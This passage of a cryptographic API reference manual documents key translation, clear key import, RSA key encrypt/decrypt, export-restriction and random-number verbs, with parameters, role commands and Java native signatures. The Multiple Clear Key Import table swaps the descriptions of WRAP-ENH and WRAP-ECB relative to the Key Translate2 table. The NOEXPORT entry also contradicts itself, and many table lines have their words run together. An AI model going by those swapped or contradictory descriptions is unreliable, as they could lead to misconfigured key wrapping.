reserved_field_5, +byte[] reserved_field_6, +byte[] master_key_verification_pattern_v0); +172 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Translate (CSNBKTR) +Key Translate (CSNBKTR) +The Key Translate verb uses one key-encrypting key to decipher an input key and then enciphers this key +using another key-encrypting key within the secure environment. +Note: All key labels must be unique. +Format +CSNBKTR( +return_code, +reason_code, +exit_data_length, +exit_data, +input_key_token, +input_KEK_key_identifier, +output_KEK_key_identifier, +output_key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +input_key_token +Direction: Input Type: String +A64-byte string variable containing an external key token. The external key token contains the key to +be re-enciphered (translated). +input_KEK_key_identifier +Direction: Input/Output Type: String +A64-byte string variable containing the internal key token or the key label of an internal key token +record in the DES key storage file. The internal key token contains the key-encrypting key used to +decipher the key. The internal key token must contain a control vector that specifies an IMPORTER or +IKEYXLAT key type. The control vector for an IMPORTER key must have the XLATE bit set to 1. +output_KEK_key_identifier +Direction: Input/Output Type: String +A64-byte string variable containing the internal key token or the key label of an internal key token +record in the DES key storage file. The internal key token contains the key-encrypting key used to +encipher the key. The internal key token must contain a control vector that specifies an EXPORTER or +OKEYXLAT key type. The control vector for an EXPORTER key must have the XLATE bit set to 1. +output_key_token +Direction: Output Type: String +A64-byte string variable containing an external key token. The external key token contains the +re-enciphered key. +Restrictions +Triple length DATAkey tokens are not supported. +Required commands +| This verb requires the Key Translate command (offset X'001F') to be enabled in the active role. +Chapter5.ManagingAESandDEScryptographickeys 173 + +Key Translate (CSNBKTR) +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKTRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKTRJ are shown here. +Format +public native void CSNBKTRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] input_key_token, +byte[] input_KEK_key_identifier, +byte[] output_KEK_key_identifier, +byte[] output_key_token +); +174 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Translate2 (CSNBKTR2) +Key Translate2 (CSNBKTR2) +| +| The Key Translate2 verb uses one key-encrypting key to decipher an input key and then enciphers this +| key using another key-encrypting key within the secure environment. It can also be used to change the +| wrapping method of the key with a single key-encrypting key. +| To reencipher a key token, specify the external key token, input and output key-encrypting keys. You can +| specify which key wrapping method to use. If no wrapping method is specified, the wrapping method of the +| input_key_token will be used. +| To change the wrapping method of an external key token, specify the REFORMAT rule array keyword, the +| wrapping method to use, the external key token, and the input key-encrypting key. If no wrapping method +| is specified, the wrapping method of the input_key_token will be used. Note that the output_KEK_identifier +| will be ignored. +| Note: All key labels must be unique. +Format +| +|| +CSNBKTR2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| input_key_length, +| input_key_token, +| input_KEK_length, +| input_KEK_identifier, +| output_KEK_length, +| output_KEK_identifier, +| output_key_length, +| output_key_token ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 0, 1, 2, or 3. +| rule_array +|| Direction: Input Type: String +| Keywords that provide control information to the verb. The keywords must be 8 bytes of contiguous +| storage with the keyword left-justified in its 8-byte location and padded on the right with blanks. The +| rule_array keywords are described in Table42. +|| Table42.KeywordsforKeyTranslate2controlinformation +|| Keyword Description +| Reencipherment(Optional) +|| REFORMAT Rewraptheinput_key_tokenwiththekeywrappingmethodspecified.Onlythe +| input_KEK_identifierwillbeused.Theoutput_KEK_identifierisignored. +Chapter5.ManagingAESandDEScryptographickeys 175 + +Key Translate2 (CSNBKTR2) +| Table42.KeywordsforKeyTranslate2controlinformation (continued) +|| Keyword Description +| Key-wrappingmethod(Oneoptional) +|| USECONFG Wrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod.Thisisthedefault. +|| WRAP-ENH Useenhancedkeywrappingmethod,whichiscompliantwiththeANSIX9.24standard. +|| WRAP-ECB Useoriginalkeywrappingmethod,whichusesECBwrappingforDESkeytokensandCBC +| wrappingforAESkeytokens. +| Translationcontrol(Optional) +|| ENH-ONLY Restrictrewrappingoftheoutput_key_token.Afterthetokenhasbeenwrappedwiththeenhanced +| method,itcannotberewrappedusingtheoriginalmethod. +| +| input_key_length +|| Direction: Input Type: Integer +| The length of the input_key_token in bytes. The maximum value allowed is 725. +| input_key_token +|| Direction: Input Type: String +| Avariable length string variable containing the external key token. The external key token contains the +| key to be re-enciphered (or rewrapped). +| input_KEK_length +|| Direction: Input Type: Integer +| The length of the input_KEK_identifier in bytes. The maximum value allowed is 725. +| input_KEK_identifier +|| Direction: Input/Output Type: String +| Avariable length string variable containing the internal key token or the key label of an internal key +| token record in the key storage file. The internal key token contains the key-encrypting key used to +| decipher the key. The internal key token must contain a control vector that specifies an IMPORTER or +| IKEYXLAT key type. The control vector for an IMPORTER key must have the XLATE bit set to 1. +| output_KEK_length +|| Direction: Input Type: Integer +| The length of the output_KEK_identifier in bytes. The maximum value is 725. +| If the REFORMAT keyword is specified, this value must be 0. +| output_KEK_identifier +|| Direction: Input/Output Type: String +| Avariable length string variable containing the internal key token or the key label of an internal key +| token record in the key storage file. The internal key token contains the key-encrypting key used to +| encipher the key. The internal key token must contain a control vector that specifies an EXPORTER or +| OKEYXLAT key type. The control vector for an exporter key must have the XLATE bit set to 1. +| If the REFORMAT keyword is specified, this parameter is ignored. +| output_key_length +|| Direction: Input/Output Type: Integer +176 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Translate2 (CSNBKTR2) +| On input, the length of the output area provided for the output_key_token. This must be at least 64 +| bytes. On output, the parameter is updated with the length of the token copied to the +| output_key_token. +| output_key_token +|| Direction: Output Type: String +| Avariable length string variable containing an external key token. The external key token contains the +| re-enciphered key. +Restrictions +| +| This verb does not support version X'10' external DES key tokens (RKX key tokens). +| This verb was introduced with CCA4.1.0. +Required commands +| +| This verb requires the Key Translate2 -Allow use of REFORMAT command (offset X'014B') to be enabled +| in the active role if the REFORMAT reencipherment keyword is used. +| Otherwise, the verb requires the Key Translate2 command (offset X'0149') to be enabled. +| To use the translation control keyword WRAP-ECB or WRAP-ENH when the default key-wrapping method +| setting does not match the keyword, the Key Translate2 -Allow wrapping override keywords command +| (offset X'014A') must be enabled. +| If the WRAP-ECB translation-control keyword is specified and the key in the input key token is wrapped by +| the enhanced wrapping method (WRAP-ENH), the verb requires the CKDS Conversion2 - Convert from +| enhanced to original command (offset X'0147') to be enabled.An active role with offset X'0149' enabled +| can also use the Key Token Change verb to translate a key from the enhanced key-wrapping method to +| the less-secure legacy method. +Usage notes +| +| None +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKTR2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBKTR2J are shown here. +Chapter5.ManagingAESandDEScryptographickeys 177 + +Key Translate2 (CSNBKTR2) +| +| Format +| public native void CSNBKTR2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger input_key_length, +| byte[] input_key_token, +| hikmNativeInteger input_KEK_length, +| byte[] input_KEK_identifier, +| hikmNativeInteger output_KEK_length, +| byte[] output_KEK_identifier, +| hikmNativeInteger output_key_length, +|| byte[] output_key_token); +| +| +| +178 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Multiple Clear Key Import (CSNBCKM) +Multiple Clear Key Import (CSNBCKM) +Use the Multiple Clear Key Import verb to import a clear single, double, or triple-length DATAkey that is to +be used to encipher or decipher data. This verb can import only DATAkeys. Multiple Clear Key Import +accepts a clear DATAkey, enciphers it under the master key, and returns the encrypted DATAkey in +operational form in an internal key token. +Format +CSNBCKM( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +clear_key_length, +clear_key, +key_identifier_length, +key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 0, 1, 2, or 3. +rule_array +Direction: Input Type: String +Zero or one keyword that supplies control information to the verb. The keyword must be in eight bytes +of contiguous storage, left-justified and padded on the right with blanks. The rule_array keywords are +described in Table43. +Table43.KeywordsforMultipleClearKeyImportcontrolinformation +Keyword Description +| Algorithm(On,optional) +AES ThekeyshouldbeencipheredunderthemasterkeyasanAESkey. +DES ThekeyshouldbeencipheredunderthemasterkeyasaDESkey.Thisisthedefault. +| Key-wrappingmethod(One,optional) +|| USECONFG Specifiestowrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod. +| ThiskeywordisignoredforAESkeys.Thisisthedefault.Thiskeywordwasintroducedwith +| CCA4.1.0. +|| WRAP-ENH Specifiestowrapthekeyusingthelegacywrappingmethod.Thiskeywordisignoredfor +| AESkeys.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ECB Specifiestowrapthekeyusingtheenhancedwrappingmethod.ValidonlyforDESkeys. +| ThiskeywordwasintroducedwithCCA4.1.0. +| Translationcontrol(Optional).Thisisvalidonlywithkey-wrappingmethodWRAP-ENHorwithUSECONFG +| whenthedefaultwrappingmethodisWRAP-ENH.Thisoptioncannotbeusedonakeywithacontrolvector +| valuedtobinaryzeros.ThiskeywordwasintroducedwithCCA4.1.0. +Chapter5.ManagingAESandDEScryptographickeys 179 + +Multiple Clear Key Import (CSNBCKM) +Table43.KeywordsforMultipleClearKeyImportcontrolinformation (continued) +Keyword Description +|| ENH-ONLY Specifiestorestrictthekeyfrombeingwrappedwiththelegacywrappingmethodafterithas +| beenwrappedwiththeenhancedwrappingmethod.Setsbit56(ENH-ONLY)ofthecontrol +| vectorto1. +clear_key_length +Direction: Input Type: Integer +The clear_key_length specifies the length of the clear key value to import. This length must be 8, 16, +or 24. +clear_key +Direction: Input Type: String +The clear_key specifies the clear key value to import. +key_identifier_length +Direction: Input/Output Type: Integer +The byte length of the key_identifier parameter. This must be exactly 64 bytes. +key_identifier +Direction: Output Type: String +A64-byte string that is to receive the internal key token.AppendixB, “Key token formats,” on page +421 describes the key tokens. +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role based on the algorithm or +key-wrapping method: +|||| +Algorithmormethod Offset Command +||| AES X'0129' MultipleClearKeyImport/MultipleSecureKeyImport- +| AES +||| DES X'00C3' ClearKeyImport/MultipleClearKeyImport-DES +||| WRAP-ECBorWRAP-ENH X'0141' MultipleClearKeyImport-Allowwrappingoverride +|| used,anddefault keywords +| key-wrappingmethod +| settingdoesnotmatch +| keyword +| +Note: Note:Arole with offset X'00C3' can also use the Clear Key Import verb. +Usage notes +This verb produces an internal DATAtoken with a control vector which is usable on the Cryptographic +Coprocessor Feature. If a valid internal token is supplied as input to the verb in the key_identifier field, that +token's control vector will not be used in the encryption of the clear key value. +180 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Multiple Clear Key Import (CSNBCKM) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCKMJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCKMJ are shown here. +Format +public native void CSNBCKMJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger clear_key_length, +byte[] clear_key, +byte[] target_key_identifier); +Chapter5.ManagingAESandDEScryptographickeys 181 + +PKA Decrypt (CSNDPKD) +PKA Decrypt (CSNDPKD) +Use this verb to decrypt (unwrap) a formatted key value. This verb unwraps the key, parses it, and returns +the parsed value to the application in the clear. PKCS 1.2 and ZERO-PAD formatting are supported. For +PKCS 1.2, the decrypted data is examined to ensure that it meets RSADSI PKCS #1 block type 2 format +specifications. ZERO-PAD is supported only for external or clear RSAprivate keys. +This verb allows the use of clear or encrypted RSAprivate keys. If an external clear key token is used, the +master keys are not required to be installed in any cryptographic coprocessor and PKAverbs do not have +to be enabled. +Format +CSNDPKD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +PKA_enciphered_keyvalue_length, +PKA_enciphered_keyvalue, +data_structure_length, +data_structure, +PKA_key_identifier_length, +PKA_key_identifier, +target_keyvalue_length, +target_keyvalue ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +The keyword that provides control information to the verb. The keyword is left-justified in an 8-byte +field and padded on the right with blanks. The rule_array keywords are described in Table44. +Table44.KeywordsforPKADecryptcontrolinformation +Keyword Description +| RecoveryMethod(One,required).Specifiesthemethodtousetorecoverthekeyvalue. +PKCS-1.2 RSADSIPKCS#1blocktype02willbeusedtorecoverthekeyvalue.IntheRSAPKCS#1v2.0 +standard,RSAterminologydescribesthisastheRSAES-PKCS1-v1_5format. +ZERO-PAD TheinputPKA_enciphered_keyvalueisdecryptedusingtheRSAprivatekey.Theentireresult +(includingleadingzeros)willbereturnedinthetarget_keyvaluefield.ThePKA_key_identifiermust +beanexternalRSAtokenorthelabelofanexternaltoken. +PKA_enciphered_keyvalue_length +182 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Decrypt (CSNDPKD) +Direction: Input Type: Integer +The length of the PKA_enciphered_keyvalue parameter in bytes. The maximum size that you can +specify is 256 bytes. The length should be the same as the modulus length of the PKA_key_identifier. +PKA_enciphered_keyvalue +Direction: Input Type: String +This field contains the key value protected under an RSApublic key. This byte-length string is +left-justified within the PKA_enciphered_keyvalue parameter. +data_structure_length +Direction: Input Type: Integer +This value must be 0. +data_structure +Direction: Input Type: String +This parameter is ignored. +PKA_key_identifier_length +Direction: Input Type: Integer +The length of the PKA_key_identifier parameter. When the PKA_key_identifier is a key label, this field +specifies the length of the label. The maximum size that you can specify is 2500 bytes. +PKA_key_identifier +Direction: Input Type: String +An internal RSAprivate key token, the label of an internal RSAprivate key token, or an external RSA +private key token containing a clear RSAprivate key in Modulus-Exponent or Chinese Remainder +Theorem format. The corresponding public key was used to wrap the key value. +target_keyvalue_length +Direction: Input/Output Type: Integer +The length of the target_keyvalue parameter. The maximum size that you can specify is 256 bytes. On +return, this field is updated with the actual length of target_keyvalue. +If ZERO-PAD is specified, this length will be the same as the PKA_enciphered_keyvalue_length which +is equal to the RSAmodulus byte length. +target_keyvalue +Direction: Output Type: String +This field will contain the decrypted, parsed key value. If ZERO-PAD is specified, the decrypted key +value, including leading zeros, will be returned. +Restrictions +The exponent of the RSApublic key must be odd. +Required commands +| This verb requires the PKADecrypt command (offset X'011F') to be enabled in the active role. +Usage notes +The RSAprivate key must be enabled for key management functions. +Chapter5.ManagingAESandDEScryptographickeys 183 + +PKA Decrypt (CSNDPKD) +The hardware configuration sets the limit on the modulus size of keys for key management; thus, this verb +will fail if the RSAkey modulus bit length exceeds this limit. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDPKDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDPKDJ are shown here. +Format +public native void CSNDPKDJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger enciphered_key_length, +byte[] enciphered_key, +hikmNativeInteger data_struct_length, +byte[] data_struct, +hikmNativeInteger RSA_private_key_length, +byte[] RSA_private_key, +hikmNativeInteger key_value_length, +byte[] key_value +); +184 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Encrypt (CSNDPKE) +PKA Encrypt (CSNDPKE) +This verb encrypts a supplied clear key value under an RSApublic key. The supplied key can be formatted +using the PKCS 1.2 or ZERO-PAD methods prior to encryption. The rule_array keyword specifies the +format of the key prior to encryption. +Format +CSNDPKE( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +keyvalue_length, +keyvalue, +data_structure_length, +data_structure, +PKA_key_identifier_length, +PKA_key_identifier, +PKA_enciphered_keyvalue_length, +PKA_enciphered_keyvalue ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +Akeyword that provides control information to the verb. The keyword is left-justified in an 8-byte field +and padded on the right with blanks. The rule_array keywords are described in Table45. +Table45.KeywordsforPKAEncryptcontrolinformation +Keyword Description +| FormattingMethod(One,required).Specifiesthemethodtousetoformatthekeyvaluepriortoencryption. +PKCS-1.2 RSADSIPKCS#1blocktype02formatwillbeusedtoformatthesuppliedkeyvalue.IntheRSA +PKCS#1v2.0standard,RSAterminologydescribesthisastheRSAES-PKCS1-v1_5format. +ZERO-PAD ThekeyvaluewillbepaddedontheleftwithbinaryzerostothelengthofthePKAkeymodulus. +Theexponentofthepublickeymustbeodd. +MRP ThekeyvaluewillbepaddedontheleftwithbinaryzerostothelengthofthePKAkeymodulus. +TheRSApublickeycanhaveanevenoroddexponent. +keyvalue_length +Direction: Input Type: Integer +The length of the keyvalue parameter. The maximum field size is 256 bytes. The actual maximum size +depends on the modulus length of PKA_key_identifier and the formatting method you specify in the +rule_array parameter. See “Usage notes” on page 187. +Chapter5.ManagingAESandDEScryptographickeys 185 + +PKA Encrypt (CSNDPKE) +keyvalue +Direction: Input Type: String +This field contains the supplied clear key value to be encrypted under the PKA_key_identifier. +data_structure_length +Direction: Input Type: Integer +This value must be 0. +data_structure +Direction: Input Type: String +This field is currently ignored. +PKA_key_identifier_length +Direction: Input Type: Integer +The length of the PKA_key_identifier parameter. When the PKA_key_identifier is a key label, this field +specifies the length of the label. The maximum size that you can specify is 2500 bytes. +PKA_key_identifier +Direction: Input Type: String +The RSApublic or private key token or the label of the RSApublic or private key to be used to encrypt +the supplied key value. +PKA_enciphered_keyvalue_length +Direction: Input/Output Type: Integer +The length of the PKA_enciphered_keyvalue parameter in bytes. The maximum size that you can +specify is 256 bytes. On return, this field is updated with the actual length of +PKA_enciphered_keyvalue. +This length should be the same as the modulus length of the PKA_key_identifier. +PKA_enciphered_keyvalue +Direction: Output Type: String +This field contains the key value protected under an RSApublic key. This byte-length string is +left-justified within the PKA_enciphered_keyvalue parameter. +Restrictions +IMPORTANT +Take note of these important restrictions. +v Amessage can be encrypted provided that it is smaller than the public key modulus. +The term 'smaller' refers to the exact bit count, not the byte count of the modulus. For example, +counting bits, the hexadecimal number X'FF' is several bits longer than the number X'1F', even though +both numbers are one byte long as represented in computer memory. +v The exponent of the RSApublic key must be odd unless the MRP keyword is supplied. +v The RSApublic key modulus size (key size) is limited by the Function Control Vector to accommodate +governmental export and import regulations. +Required commands +| This verb requires the PKAEncrypt command (offset X'011E') to be enabled in the active role. +186 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Encrypt (CSNDPKE) +Usage notes +v For RSADSI PKCS #1 formatting, the key value length must be a minimum of 11 bytes less than the +modulus length of the RSAkey. +v The hardware configuration sets the limit on the modulus size of keys for key management; thus, this +service will fail if the RSAkey modulus bit length exceeds this limit. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDPKEJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDPKEJ are shown here. +Format +public native void CSNDPKEJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger key_value_length, +byte[] key_value, +hikmNativeInteger data_struct_length, +byte[] data_struct, +hikmNativeInteger RSA_public_key_length, +byte[] RSA_public_key, +hikmNativeInteger RSA_encipher_length, +byte[] RSA_encipher +); +Chapter5.ManagingAESandDEScryptographickeys 187 + +Prohibit Export (CSNBPEX) +Prohibit Export (CSNBPEX) +Use this verb to modify an operational key so that it cannot be exported. +Format +CSNBPEX( +return_code, +reason_code, +exit_data_length, +exit_data, +key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_identifier +Direction: Input/Output Type: String +A64-byte string variable containing the internal key token to be modified. The returned key_identifier +will be encrypted under the current master key. +Restrictions +None +Required commands +| This verb requires the Prohibit Export command (offset X'00CD') to be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPEXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPEXJ are shown here. +Format +public native void CSNBPEXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_identifier); +188 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Prohibit Export Extended (CSNBPEXX) +Prohibit Export Extended (CSNBPEXX) +Use this verb to modify an exportable external CCADES key-token so that its key can no longer be +exported. +This verb performs the following functions: +v Multiply deciphers the source key under a key formed by the XOR of the source key’s control vector +and the specified key-encrypting key (KEK). +v Turns from on to off the XPORT-OK bit in the source key’s control vector (bit 17). +v Multiply enciphers the key under a key formed by the XOR of the KEK key and the source key’s +modified control vector. The encrypted key and the modified control vector are stored in the source-key +key token, and the TVV is updated. +Format +CSNBPEXX( +return_code, +reason_code, +exit_data_length, +exit_data, +source_key_token, +KEK_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +source_key_token +Direction: Input/Output Type: String +Apointer to a string variable containing an external key-token. +KEK_key_identifier +Direction: Input Type: String +Apointer to a string variable containing an internal key-encrypting token, or the key label of an internal +key-encrypting token record. +Restrictions +This verb does not support version X'10' external DES key tokens (RKX key tokens). +Required commands +| This verb requires the Prohibit Export Extended command (offset X'0301') to be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPEXXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPEXXJ are shown here. +Chapter5.ManagingAESandDEScryptographickeys 189 + +Prohibit Export Extended (CSNBPEXX) +Format +public native void CSNBPEXXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] source_key_token, +byte[] KEK_key_identifier); +190 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Random Number Generate (CSNBRNG) +Random Number Generate (CSNBRNG) +This verb uses the cryptographic feature to generate a cryptographic-quality random number. +Format +CSNBRNG( +return_code, +reason_code, +exit_data_length, +exit_data, +form, +random_number ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +form +Direction: Input Type: String +The 8-byte keyword that defines the characteristics of the random number should be left-justified and +padded on the right with blanks. The keywords are listed in Table46. +Table46.KeywordsforRandomNumberGenerateformparameter +Keyword Description +EVEN Generatea64-bitrandomnumberwithevenparityineachbyte. +ODD Generatea64-bitrandomnumberwithoddparityineachbyte. +RANDOM Generatea64-bitrandomnumber. +Parity is calculated on the seven high-order bits in each byte and is presented in the low-order bit in +the byte. +random_number +Direction: Output Type: String +The generated number returned by the verb in an 8-byte variable. +Restrictions +None +Required commands +| This verb requires the Key Generate - OP_IM_EX command (offset X'008E') to be enabled in the active +| role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBRNGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBRNGJ are shown here. +Chapter5.ManagingAESandDEScryptographickeys 191 + +Random Number Generate (CSNBRNG) +Format +public native void CSNBRNGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] form, +byte[] random_number ); +192 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Random Number Generate Long (CSNBRNGL) +Random Number Generate Long (CSNBRNGL) +This verb uses the cryptographic feature to generate a cryptographic-quality random number from 1 - 8192 +bytes in length. Choose the parity of each generated random byte as even, odd, or random. This verb +returns the random number in a string variable. +Because this verb uses cryptographic processes, the quality of the output is better than that which +higher-level language compilers typically supply. +Format +CSNBRNGL( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +seed_length, +seed, +random_number_length, +random_number ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +Apointer to a string variable containing an array of keywords. The keywords are eight bytes in length, +and must be left-justified and padded on the right with space characters. The rule_array keywords are +described in Table47. +Table47.KeywordsforRandomNumberGenerateLongcontrolinformation +Keyword Description +Parityadjust(Onerequired) +EVEN Specifiesthateachgeneratedrandombyteisadjustedforevenparity. +ODD Specifiesthateachgeneratedrandombyteisadjustedforoddparity. +RANDOM Specifiesthateachgeneratedrandombyteisnotadjustedforparity. +seed_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes in the seed variable. This value must +be 0. +seed +Direction: Input Type: String +Chapter5.ManagingAESandDEScryptographickeys 193 + +Random Number Generate Long (CSNBRNGL) +| This parameter is ignored. +random_number_length +Direction: Input/Output Type: Integer +Apointer to an integer variable containing the number of bytes in the random_number variable. On +input, the minimum value is 1 and the maximum value is 8192. +Use this variable to specify the number of random bytes that the verb is to return. On output, this +variable contains the number of bytes returned by the verb in the random_number variable. +random_number +Direction: Output Type: String +Apointer to a string variable containing the random number generated. +Restrictions +None +Required commands +None +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBRNGLJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBRNGLJ are shown here. +Format +public native void CSNBRNGLJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger reserved_seed_length, +byte[] reserved_seed, +hikmNativeInteger random_number_length, +byte[] random_number); +194 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Restrict Key Attribute (CSNBRKA) +Restrict Key Attribute (CSNBRKA) +| +| Use the Restrict KeyAttribute verb to modify an exportable internal or external variable-length symmetric +| key-token so that its key can no longer be exported. +Format +| +|| +CSNBRKA ( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array +| key_identifier_length +| key_identifier +| key_encrypting_key_identifier_length +| key_encrypting_key_identifier +| opt_parameter1_length +| opt_parameter1 +| opt_parameter2_length +| opt_parameter2 +| ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 1 or 2. +| rule_array +|| Direction: Input Type: String +| The rule_array contains keywords that provide control information to the verb. The keywords must be +| in contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +| the right with blanks. The rule_array keywords are described in Table48. +|| Table48.KeywordsforRestrictKeyAttributecontrolinformation +|| Keyword Description +| Tokentype(One,required) +|| HMAC SpecifiesthekeytokenisanHMACkeytoken. +| Exportcontrol(One,optional) +|| NOEXPORT Prohibitsthekeyfrombeingexportedusingasymmetrickeyandprohibitsthekeyfrombeingexported +| usinganasymmetrickey.Thisisthedefault. +|| NOEX-SYM Prohibitsthekeyfrombeingexportedusingasymmetrickey. +|| NOEXUASY Prohibitsthekeyfrombeingexportedusinganunauthenticatedasymmetrickey. +|| NOEXAASY Prohibitsthekeyfrombeingexportedusinganauthenticatedasymmetrickey(forexample,anRSA +| keyinatrustedblocktoken). +| +| key_identifier_length +|| Direction: Input Type: Integer +Chapter5.ManagingAESandDEScryptographickeys 195 + +Restrict Key Attribute (CSNBRKA) +| The length of the key_identifier parameter in bytes. The maximum value is 725. +| key_identifier +|| Direction: Input Type: String +| The key for which the export control is to be updated. The parameter contains an internal token or the +| 64-byte label of the key in key storage. If a label is specified, the key token will be updated in key +| storage and not returned by this verb. +| key_encrypting_key_identifier_length +|| Direction: Input Type: Integer +| The byte length of the key_encrypting_key_identifier parameter. This value must be 0. +| key_encrypting_key_identifier +|| Direction: Input Type: String +| This parameter is ignored. +| opt_parameter1_length +|| Direction: Input Type: Integer +| The byte length of the opt_parameter1 parameter. This value must be 0. +| opt_parameter1 +|| Direction: Input Type: String +| This parameter is ignored. +| opt_parameter2_length +|| Direction: Input Type: Integer +| The byte length of the opt_parameter2 parameter. This value must be 0. +| opt_parameter2 +|| Direction: Input Type: String +| This parameter is ignored. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| The currently supported service (Restrict Export of HMAC tokens) requires the Restrict KeyAttribute - +| Export Control command (offset X''00E9') to be enabled in the active role. +Usage notes +| +| This verb is available starting with CCA4.1.0. +JNI version +| +| This 